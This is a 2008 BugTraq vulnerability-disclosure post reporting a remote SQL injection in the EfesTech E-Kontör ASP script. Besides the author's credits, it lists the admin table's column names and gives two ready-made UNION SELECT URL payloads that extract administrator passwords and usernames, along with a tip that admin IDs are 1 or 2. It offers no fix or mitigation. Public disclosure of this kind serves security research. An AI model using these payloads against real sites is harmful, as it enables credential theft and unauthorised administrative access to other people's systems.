BugTraq
EfesTech E-Kontör (id) Remote SQL INJECTION Mar 23 2008 03:25PM
dj_remix_20 hotmail com
##############################################################

$Author = RMx

$home page = www.coderx.org

$thanks = Dynamic , TR_IP , Liz0zim

$Script name = Efestech E-Kontör (tr)

$script test = http://www.aspindir.com/Goster/5145

$script sales = 750 YTL

##############################################################

// EfesTech E-Kontör (id) Remote SQL INJECTION

// Table names

id no = id

password : sifre

users = firma

exploit for password = ?id=-1%20union+select+0,sifre,2,3+from+admin+where+id=1

explot for usernames = ?id=-1%20union+select+0,firma,2,3+from+admin+where+id=1

NOTe = İD values 1 or 2 for admin

Bye

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus